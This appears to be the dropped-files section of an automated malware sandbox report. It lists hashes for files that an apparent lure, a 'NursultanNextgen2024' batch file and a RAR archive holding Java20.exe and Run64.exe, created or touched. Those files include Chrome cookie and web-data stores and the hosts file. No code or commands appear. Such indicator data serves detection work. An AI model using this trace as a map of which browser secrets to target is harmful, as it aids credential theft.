C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bec9f22a-2898-478f-b2dc-65834cdebbfe\index-dir\the-real-index
| MD5 | c68539e910c56f4c8e28a7551c579530 |
| SHA1 | aa3c0f0f848b4d299034f68efd3cb34ca14e7753 |
| SHA256 | b28d0449cfe4f3e049602ae5bbce2f417f00226e6104267085962698b20e2418 |
| SHA512 | 0797f77a764b5ce0a97974ca403749092ee3cef25cda1c4fc23bc2ab2b5badab2cbe73b7301a40e037f4475f45e2e058f65781cce46789c2138bd8facb69fef6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 97791d67f42739b1b8a5823845bf99d4 |
| SHA1 | 70e41a9e504faf75794a80002df56c02f74883e3 |
| SHA256 | 46f60fd852b21f0b3a78bfdcb7f4db48774657b66371e5bb55d4b87e1162fe01 |
| SHA512 | dbb76678a82481a13f86e6f50f398788f3ac79241f71e4af426b1f6b74f730a5d8446e77952ba717625edd4db0f828ff4a24d4780282d7a82696c39d17a184d8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 7e15344393a308bf841b79f3e6281cab |
| SHA1 | 6c843e30780997ec296c65f2afa9326f1c9996ab |
| SHA256 | 2418bdd4297a66b20d8095f803cb9107297cb9c21194a20207ab89b99ee088ca |
| SHA512 | 702bb36fa6fca292f70517dd1161001d5a5cacf7fb6fa9ac357d07066874f0ccc832f1d570b90c672f80cf0e67c83b8a1dd8ecde75a2d35bfb90b747023f9cde |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 09e30612822daaab3b5b0631239857af |
| SHA1 | 2813fde81d86bf9fe2d8f063b201d16bc86fe5a7 |
| SHA256 | 871a5df4a65dd7b9f83c9245718d6916f6ec3b2b4431f0abf3694560bdec74f9 |
| SHA512 | 8b51b0ffc6a5f11cdc744d403358e95ab098abf1cc08958e85ef70cf0087f14dc63ef605ca86a3956029d50413764f183a2c91b4ad0fd60ff0b2049ef3761c39 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | ff84005689cab36ad1d8cb461195b0da |
| SHA1 | 31517b7c8c8cd2e1e2aee42aae9617d4bbfc4b6c |
| SHA256 | 65931dbe5de36f7b341a94acd2e5344ab3fe388b20ee51d039e1b78f7cd39720 |
| SHA512 | 4a893ee0acde12e2bc60315be5953acd1d0708488a467932b4c49c91ad63defcb1c8ae38811638d26234a99f70d8fb6eb705c1ecde29f9ac18b70cb276a4976f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5bdf02.TMP
| MD5 | 316120b4217de76ecd75025bbbdad810 |
| SHA1 | 3ab74b95f3d12ef0f3d16c625ef2ace6754601ea |
| SHA256 | 0562743372710f22811e9e1ba210d0e68c1261caf7697ae56a84afacca1c6d65 |
| SHA512 | 8945096b5064ba48ea541ae807b4fe781e968d8f7bfc7d3e0fdcc8f0ce3fa19a6f947506d8f8a10b6459a2222f550a2b62babc89d463d09ead0c106dce754e8e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | bef5535e5334cf9bdb1d3ebe845935b9 |
| SHA1 | c6178ae7a044d251593bb1d3cec9c29290b22e08 |
| SHA256 | c9e039c28e82f180e4a85fc2fcf9247e51648051e92dcb12bc38614d6d5153d4 |
| SHA512 | 7086b1e50b9daf45b5ade1ba1ce4327936d87d6528e250ecd23870ee86147959be7ac7547ee59432167be092fc5384ed402223f930a7e804a2c43ce20893d8b7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bec9f22a-2898-478f-b2dc-65834cdebbfe\index-dir\the-real-index
| MD5 | 64c9f85487158952265777adc6a44b7e |
| SHA1 | d68c0d0c2de7e32787c8dcf5ad7e8aeb91411d46 |
| SHA256 | 2b32e45e4669b590a88217ceb70a3b5af571cfb53f5474c7721b7b35c3473900 |
| SHA512 | 460ee1e7f0d5bb9b7857f395dcb455dab87dcdb8101c923748cc265dce2044dc08d679cbf4bc1efa59cf2705f8cd753d1c6146d7768dd5732fd194e4ab1c92fe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 7a25047e21d1e4c4ec9f01688e88fc8c |
| SHA1 | 8371a3ed864407c864d1e09bdae95aedebc36d70 |
| SHA256 | c019d8a2d9bc08a37d3e0b42904c2a839ea1972550dd61145394aed103e5e613 |
| SHA512 | bf90a362dfb3c413b594d2e962e3de489c97491c4787683241b699461a3b3a0e4d9991c78783e7469b78ba3848ea276a2dd7d5c44aa4b0e39d455635f643cae5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000048
| MD5 | 6a398c523b4af71cc52ccac6368818a4 |
| SHA1 | 62227e5498db7cd86e0b6e68dd2530dec33905e0 |
| SHA256 | 0375bff344824419266a6621456ddbec01cd642035d6389f03c6d6ec299d81db |
| SHA512 | 882621913e323b9c89fb68561bf78f104e629e1741245fbe2d0a8b8a9404d5ed961106f9e717f040cbd145ef901b1e8b0b787786a79eb2b15d4e3c597e3c2580 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 82481920caa854d3af4cf88915290206 |
| SHA1 | 42e9ac6b31339421dc90f986d919f179aed78b07 |
| SHA256 | a7efb724908ada491e605b8cb5f723bf5cf251133d5d0b2f6d63e2dbb8d7ea01 |
| SHA512 | d23fdce6e451deb3aef9222f4b95a5762873cf993c9aadd2d3ebb19dd4497d29e8a5867c560b059a4d398ea7db6c9960e325fd321bb2c63a734e21cba4210e92 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4c771f536c529912ffe8cc33245316e2 |
| SHA1 | d82ba5e38a3504ddc3c9f9b899e10f52df369af8 |
| SHA256 | 741a6f666503fe63a6d1b75ed7593010acf3b52a8afb4ad917fa438cadd0940c |
| SHA512 | ceb3a00d887392432ee122e2f3d0f4ba038cce753b7e5b7375bc2539848cc96b7a34b8bff6c93b5ef05463ad480c5841bb83a07be6ac848d79d2a795abc9c20e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 49c84f150dad134d3e661aa581ea36e1 |
| SHA1 | 29f9a12358507b190bb7a59c293bf9550bd5dc89 |
| SHA256 | 44eb8a928c5926f4a42271dc7c201a42211b7d0d642d68e7e4397ffa49349093 |
| SHA512 | 336651ff938369357b15b1dfd0704e15c0505285d2a063d2862a2a7a15f710b03122187947fddbfd37dd986a9f7891f9f0125d4b8d3b626f3fe9fdaeacf3300c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 65278ff6f9a46ab629be3208dc9c9ad0 |
| SHA1 | bdd395ceb75c922c17d7f828bf9fd95bddefb4bf |
| SHA256 | a26a26de99dbe33a79d9e0e0d2c72c6be4c6a0b5226a5ee43ee90373b418cb2a |
| SHA512 | 7d921f4e47b9039a7eaeca2ce29dfd8ffb0dd06bc468901c4ad17d7a52b479e8ecd3f725b07fcf771606afc7b75e5197aece00f8dae4ff6312458f40d9ec6f91 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 96453f1ebed7c8902cafbcc2d6252ce5 |
| SHA1 | 517b662774402d89fd80bd56acf47945fe74abdd |
| SHA256 | 50cb33f5381b201f6decf6391624368831e9cb807c51de6e20d21cf50d6a990b |
| SHA512 | ce681d48dbe025f9b365ebeedfb9785deebe33dab302a98489d303f1237a492ba14357252a5f496546b61b88f4a2c0abbe96bcb01ed02c519171c60d9e643b6b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9269376eb8c2ab4f786bf66ae9c973a7 |
| SHA1 | f82fabded4e0c622acffce44ecf74699ee529ee1 |
| SHA256 | ec45249b3ef5ceed067a2039e2829348ba34224eae92c3c7a9cce0a4c4956c29 |
| SHA512 | ec3ee8ab276dcd4136cac8b3a698542f0efe5a9310bdb687652f722e39ebd887060099cfa463b49c03f5da54e22f2254640c0ba40e07419d5d48d56a7538436a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bec9f22a-2898-478f-b2dc-65834cdebbfe\index-dir\the-real-index
| MD5 | 9155c7e5749f994b1833ca9d7162ed98 |
| SHA1 | 95b2374c0fc14f5d721ac5b97387d5f2282dc4c7 |
| SHA256 | 044983b28cb51427c7042d48abcffe7d2c626e48ef9773ede75531be00740b28 |
| SHA512 | 5a518951a551be3c67d2647806c5e0230cda43bf455346d99d2e4990aaff60ff31d9ce6f40a27438f9745683dd29ceddd062c786671eb16a0daba306993cbddf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 745a1f25613df1f98383fce580eca58a |
| SHA1 | cfa15b7eaefdd4cdb20b3055f7e943603d886b9c |
| SHA256 | 1d10fbda63e2d148b2ade6d96f31dd1e1c17db8d6cd0d13dfe47023c8d0123a1 |
| SHA512 | 8f2a724b3f39d7aaddc85a2ba743768b60eeb1739597d81c469ad63878fa003ead0250913d8b4ab11845c9111fe85a4447eab86d140ef2df3c32be900580949f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 469194fcc909c8ca63ccf731be06e508 |
| SHA1 | f29c37693fc4e575fe7ee353735eca0d90d35b94 |
| SHA256 | 5873ca8fffdd02e8fec060ebc14ba902741182c3db3d7137aa287a1be62c2748 |
| SHA512 | b8b61c5a4af44236732155b7eca48c5c71d955ccb72710039795d995bfe68b7273386a077589724a8852cfa47ff511bb563b21f1e4629dcc7e2b54de43778f04 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bec9f22a-2898-478f-b2dc-65834cdebbfe\index-dir\the-real-index
| MD5 | 6553baba1c9dc31e9304a099905b0e0c |
| SHA1 | 982c9f07f9ce606c6cfe001252907cf169b6cbea |
| SHA256 | b37dab30c59be769985c6cab74a8e157772cf73dfc858fd296672c40c10bbfc6 |
| SHA512 | 216947f10ea6be02e5a2b4b30a3b3e4378805e7c8ba0ef6ee4ed3f1773a469f34440c1829bb13a8d9348b3f82182dfc8156ca32f42cf7a02599de69a1f3ec423 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | be86ef8fb613ef08fc94eae595287a7a |
| SHA1 | 09c13dab601e2f35f03f8c1c4b7f0f0710682511 |
| SHA256 | 79699e11e496f01cc03f9cf8f12dac19842dd2735ca82582a0eb0945c751b415 |
| SHA512 | 3032254e6469aa746eb733e07ebf491424cdee24fe7662d6d221f24576afd014eba5c91e5750afaa997581ead5248643840add4fc281e44162920cfbeebacd3d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 5b3dcec9de33bc0f348b8bbe71beedbe |
| SHA1 | 624a517a1f793c0b90645fe7d8f46c3d66f0d4dc |
| SHA256 | 1d7fd43d09caa0bc77d2a057290ddc8673294ba7c27325c3788984468ebcc2af |
| SHA512 | 3a1ee6b96a5fb6f9a0a2d79b67a950d398c3e4a320e6d9d4cef9f283d4dc10072296be1116e7a101f82905b1f98b6e897e4c8151702470c745ccc27eabfb8297 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c0e6d2669c00ef7e9a1af32375f94c1d |
| SHA1 | cfda4cfd20783b59d835d005c0b063290a6ba80a |
| SHA256 | 1f6ba6f27c3bd114076f803fe6d778beeaee30872f25f2af5a37bc861b4b7559 |
| SHA512 | 17a8ffeabfdc4c03fdc1e7444bcd1372ffef4043c974f54eb58a377f818c4c436a982db5deec08b96f4fcd0fad8189dc3d972b3e4dfe50ca1b33c9bac648c86b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000061
| MD5 | 97f07e182259f3e5f7cf67865bb1d8f0 |
| SHA1 | 78c49303cb2a9121087a45770389ca1da03cbcdf |
| SHA256 | c3a70f23a2cf331852a818d3f2a0cf7f048753c9b47aa4e7f0fee234c46b226c |
| SHA512 | 10056ad3a71ee806a8d8aff04d513a079568bf11799016f76f27c4255be2141a4c2d99c1f46bbfde9c99ba0f8b44e780a92b59f514d3cc1c248ead915c31b5dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 6c0223b80a79d87f9fa27df67a5f0411 |
| SHA1 | dc4eabc71529c9027079e27938b0c3ca4bcf679e |
| SHA256 | e14a5c6d7282a906560be643e82ba75b25cc0f7b2d369b6fd4c5b4d4b12f55b2 |
| SHA512 | d0b6304cb04b711b66d9d6eb76d737e4ef34c16ecb1abffe82b73ae69e8dbb755583f701f66914e45c683a7b47516e3404d85b515f074290ea9198c32cfc3d85 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bec9f22a-2898-478f-b2dc-65834cdebbfe\index-dir\the-real-index
| MD5 | db08fb9e464d55427dd82c00fd34248b |
| SHA1 | 8f2c97dad9ef273f8eefd87da997a8ea9c4e5f0e |
| SHA256 | 3f15374ac82b9571bc787d90a12df6a40569ff1605baebb865cb3f99e2a58e1a |
| SHA512 | de98994e62d214cea9dc910cd77fbf278699ce17b6ce74c24bb4452865be96e8c1d4f23d0debe6e83d66724c9ce542077c6f1d047cfa8d19c322d05e28b1dd8c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 36a6b710f5d4ee0c16bd45a203f14cfa |
| SHA1 | 923a6d9bee048019ab9d2bf5df34e8ee1863f0aa |
| SHA256 | 46d7ac080cb25c8f75e240ffa5137830871ca63d0241309c770593b8547253f0 |
| SHA512 | 832f96019e0410aa93644ce0f50a4cc0b0b805edf90893ebf58154c165f16a52bd7e65daa25742b33cb177aafed15d14ce61189c50432dd7253d2b0deb6af782 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fd262c2994abcd109caae925232f5816 |
| SHA1 | d6f64fe9acd3a5ffbceff1aa969c68cc24a997c4 |
| SHA256 | 4a20df0bb470d788a9fb08f49c0bf33fe7b044fd14164adfcb1b43d11f789484 |
| SHA512 | af6e8eecff9b5cc70988665178089e5d3ed92e9ac4d3646404deeefe77a3201881777d4ca54b72ea7f0a87f0fb60fd4411b72c5a0ef6e9316a815104a3282802 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 41a717e135bc0eb6761cf6058b7333fd |
| SHA1 | 42db15d6736f9e81c3d6052dd5c2bb69fd0c06f1 |
| SHA256 | bf71ac0c92d2ff501c6c49d1cdc991f1bc5c4a5f342ea4130df0f8ebd07cebfc |
| SHA512 | d065bcae17650870e39edbb9fc0c6105620c67717dada54ee1a53949d9920add88eee178651ae7b9f191e726f9a488a02199098f9d5ee0b72e393f1b3cbc7c48 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f5df81949a8865219d17b0a697f8f020 |
| SHA1 | 568aa81b1021b463a94a8e88ce5412e520d530a9 |
| SHA256 | 30c28d1399fe9d1c53481fcaec13e7b43cbf3d5be72fdfbe2e0b717637747095 |
| SHA512 | a7c8bfb3d7ee2147657cb34e3c885c2e4de0a26d3f10e13b6f7d1365ba74e7a3b0bde8e460a8c28a04b9ace260c18c5ea67235be9f655553d15758ca8ee5c61a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | fad2d152209d86053b7bd68e073e3b17 |
| SHA1 | ecca2df01331f4f48aa7b4f814e78421046b38b0 |
| SHA256 | 376b9870642f3fa9276f24bcc8f084aaaa5b14e81bdeb649a9bef8dfcceb9d8b |
| SHA512 | 297911c097cae65eede5b6ab3c67af79a340664e19a30a4ab44d34bd7ac348eeb412e3ba1da24ab08b739989374bbfe71178700dbaeb4a435c21cccfcee52c18 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9154360bb090b0960a2d429e8d2696ba |
| SHA1 | e46372ba232cb75df562c7d5f9da1b3fe3d0900d |
| SHA256 | 2e4c534381707a1aa0c144a367115db5688117aded92144f8e2a49309917052d |
| SHA512 | d3214a98765d87656b10ddf04f29271cbfd7ec15f1d2c729bb26bd4a1055ba5c74935add0ce1a4c61ca3dfe422ed47622163fcf8334b51af5bc7ae43dee2f2fb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6acda0baa31f42a776477f36def2d7d6 |
| SHA1 | 004247496321c89305cc18215db200b1cf01fc78 |
| SHA256 | 6b124579c52a9112fd53393ebcdb747e0387adea8d8544f06b74b9c9e93e0e7c |
| SHA512 | 83cca2506b5289c994d36a6676a7811bba0fda1859ae420b0c0ef75e6b1b9a204891a19afba7b1958fae36d79d1e09cdb7e06ab4dfc80bd0c2e89dc53214cd03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 60d361e61e2ef17ab9e80e5934c9e093 |
| SHA1 | 162e50cf22f7bf167467116fdf952d1755c8853e |
| SHA256 | 1a39dfb1b1c8e09cdd8f63fcff0bdcca2553a8a758d1a1a70d43c15681bed20c |
| SHA512 | ffa806aa4e6fa18fc98a28ac208e6953ffd88158c327cdb11abc2a3dcece636123be2884c13d9474f5f11c5737a2f590eef7f1eb5384d13ccf923e79e3e7a47b |
C:\Users\Admin\Desktop\NursultanNextgen2024\kdotlbBcbF.bat
| MD5 | 988dfb6afa81abbe75df1dada54b231c |
| SHA1 | ce6941a0a8fdb5e00c1037b0f7657bcd7a63f830 |
| SHA256 | 968bd350c1c19099f54691d26ce0b80649044f3fa5108bc665b7234e1b758dd5 |
| SHA512 | 04c511d46351cdfc0ac3a6ba0e574a4d177ab9d55101c020ec8e1eca3049a87f4568bf460e13cf156970978c303c18c465a583efdafdd15a3455c492b5da7c11 |
memory/4152-1341-0x00000209C79B0000-0x00000209C79D2000-memory.dmp
memory/4152-1344-0x00000209C7B60000-0x00000209C7BD6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lx212ljo.vky.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10adf8436921127cb4c1b96754031b21 |
| SHA1 | c079828bfb270e88826a36ade20714dd31b38d20 |
| SHA256 | 212ca4941b4c1fe98f8bd6a9dcff0e8f1482bff910f886966d2ebac1a96fa1b6 |
| SHA512 | c53dd6289f37189fe28732162a75eabe4378ed9dc347dfd2a1e35b54e7593ead6c107e14d69650a3bd9d23609b5cd786cc7a26300e378a782300b62d32a955af |
memory/4788-1557-0x00000212D1600000-0x00000212D1622000-memory.dmp
memory/4788-1538-0x00000212D1600000-0x00000212D162A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b2fe3619f874f88bc7929e22a86cd9bb |
| SHA1 | e891e3d423ac03966f9917e60f8cba34437dcc42 |
| SHA256 | a84d9df242965a569112c352650449290ecfe7a52d63b30c2647d83ac5966333 |
| SHA512 | 98044a1d30bc4d4215a182bdaa024e41a01067c3b5a44a52c486d477be0baffd01a07ed653e17f9231f051428143cbe74ddd0d91664c25683d6ae94003c0971e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 54a8c3861fb74c1c83951f97a05e1531 |
| SHA1 | bfe2b5f49c95134ee5b2d2b4cefdd12638de5af2 |
| SHA256 | 3f3e126c09f5b434275821373e28df59cde1211a3a340a54a39481775d1ef6a8 |
| SHA512 | ba4346bbc7d1fa6ea4a490d2bd536bfb4c7e7994d7d2247d944279af245fda700b8f4c94dd754caf207c7fd2d90a59d0ac8013e37ed77a715f39e78389a01f7b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b809e482a8205f05cc8f6ee70d02fdb9 |
| SHA1 | dfcf702ee61aed76c64239898f3b67bd4982f10a |
| SHA256 | 48b66a9334ce935afaae4a87dd0c88ff05b5f4a234994760979534cb9a8f0327 |
| SHA512 | 69fa2991100b87d4d47a507ffbb7174497b46c7dbe51ac92765fd580d77a018eac6eb5f071c599e1dc7cf907af83e4beac064ba8a865b1349686f25985593f4a |
C:\Users\Admin\AppData\Local\Temp\Cache.rar
| MD5 | 8d81c24c788d3b677ae69bb05b332ca3 |
| SHA1 | 4c22763de908a474c072f6be63f9f4b739677b6b |
| SHA256 | 5dff0b0233de8fc9e1e4d2acca3bf31356b6ad5e391a19d83b25ffde35368033 |
| SHA512 | 234e56f23a47e01b6ed16bb448e0c418908d929c2c4f02802ba5ef7fdca248db465932f2e42e695199c61156b12378340f51f4a9bcb7360dee45915cce52e115 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
| MD5 | c4d99bebc185a005d42c1554467adb20 |
| SHA1 | 735b6e7dcbaa96d4059918a864d26afa7d15f221 |
| SHA256 | 05b97b1a01c860431abc0ad0cc3b808a2ab281fee02926d45ceda01adbd9bef6 |
| SHA512 | 60b23492ce15bc0b73455dbe4e47d7b4ec3fafe8bd53817b3f35114ab0b201e4ef9bed16f35045dcb430535ae07f867fe53ffd4a93c5fbf47567107c7f44c2bd |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
| MD5 | 771ebc5437983534ab8ff6b091cf2ded |
| SHA1 | 8581e29460d5909ccff01bdad4ab106431c89eeb |
| SHA256 | 53eb1f650b78da51f4d24a5185d4e64c415951923acc9850bb946ee5ab374bf8 |
| SHA512 | ae441d38be3718b25ce79eaabecab5137b952888c7b983e86b7c620c87508259eb74b1c7c7dd44fe2c5e36404b2460a26e8e8c3e74d388eb5f7d4ebc45920bb9 |
memory/1832-1660-0x00000000003D0000-0x00000000003D1000-memory.dmp
memory/2324-1661-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1832-1662-0x00000000003D0000-0x00000000003D1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | 9eae63c7a967fc314dd311d9f46a45b7 |
| SHA1 | caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf |
| SHA256 | 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d |
| SHA512 | bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
| MD5 | d8d31e71a1ea069761b1bcefd26e833b |
| SHA1 | 3114f26738d94d418c0d37ac40cd47f220a620da |
| SHA256 | c5683c1b5362e9188601550d5ba54311fc6ab9869b64451bb90a7f7477828bd9 |
| SHA512 | 1f73571847771f5432e5d00245609316c485adb7d7a6b2b27876157f3168b505a2dfdd2fa7ffbfb38d1d5da092d5a5dbefb4fe5bb79db9162e25d7d672d16bd6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
| MD5 | a442a34198d0b755f73e691dbefedc06 |
| SHA1 | d1ebf9f5cec84fa1eec45528c469a1d6aa9976e1 |
| SHA256 | 89f31c03784ef4ebdee0526e41db788a99ff8a119379210b76e60ae1b781ccc8 |
| SHA512 | 9b7124f07aeb52b2d518bb183fe7059de1842a9d2064d976fe8c519737e84a42a0ba5ae35e5797114d9ddd4af368b3e5b439010a29035948faf8ef939ba9b0e8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | d65c61710c85764b08c5cb867be1a2a0 |
| SHA1 | b184c4ea403ad860e3cd97c8d372d540376898f8 |
| SHA256 | 31ac70d29e07157b474a36161c41f67c64ee3f4d7bfefe61adfaa7b1bace6f19 |
| SHA512 | 460b0b52e255a801e31b13e8763500cd025c8b3c41f98388e6dc8a40655d57815fb2d632189bb27798fa73db0d62f2adb9f280ac7e152bfa2cb8b5d151f2433e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1
| MD5 | 4b7bdca641d1737fa59da41dc8221985 |
| SHA1 | 99318f0f9882d7b41d0614c6d905a22e9cd60992 |
| SHA256 | fb1e9a7d32e760d033b66f25bf0c0967fad7035df8f862962ad68a71e777e4b4 |
| SHA512 | 2090f0ffc82ee04106901cd9b60e7b29c4f84387d94ef39470a6f90b8f4261dd44f116925183c95aa76edd11167767a1a94b2495eb9ffa561b9c2db4d4500422 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3
| MD5 | fcbbaa2727251e82d2b915b3178733d9 |
| SHA1 | 9806a6d60bfd16f9cbaadccc29e0e744386563bb |
| SHA256 | bf6e87ea8a7588298b73306744a90382be4f1b3d73bebcedb84ab57e9e4a20d5 |
| SHA512 | 545258f8c50109cc3316a13ab70d6b40e3edca3081ea3b9360c857bec3a7e46ca11ad5d41ca233863f7f106982b8f4cbfc4e6294f4c82a0b83921062f2164e56 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0
| MD5 | 19646d417358e21085cddfab5c675dbe |
| SHA1 | 57395eb217a12226881fed2d156d3b97cb9022b3 |
| SHA256 | 272a2a69be48eaa29aed3e444bb2513f18485935c0db8a520f6105fd954231a2 |
| SHA512 | 67c19b33ffc59c03d1bc3a09f6ffec8426415576472736f415e5bebb20538a2ae6942f2128b3f83dc7652e8de66edf15deeb3f71de5ad667d4437859b38524a7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.ldb
| MD5 | 001ecf48527b43eb03446b0ab4cfb8f0 |
| SHA1 | 58ee55178b0631cfb9871ee40c8c07be09fcdb20 |
| SHA256 | 20356ef534ea61f5750c2ef07a30250c8bdb7e1b565dfc84193beb32e8e94a56 |
| SHA512 | 379aba13a310402157df7116e0ab31c631b0f096e7dfea3e25c484807b24b6ad8a4dcf9beebe4ca85c9cce2ad7f657678fad15002e57cf3684827973ff13c935 |
memory/2324-1975-0x0000000005480000-0x0000000005512000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e3b0eefe01d317d1ac5ac228cf3169c3 |
| SHA1 | 85ed511b07e5d3155ac136230c022dba80dbb551 |
| SHA256 | a89335c300f6549cf2c69b0660734db5fee6204b5640797ab9225b4886465635 |
| SHA512 | 2617589d32660891c5ecabc1caf2e891f928ab5ecf99628fc6121d1d6aadb146788a92a86d67fe75a89204037c982163f68b6d851305f5694a9d89ed2eb7088f |
memory/2324-1989-0x00000000060C0000-0x0000000006126000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
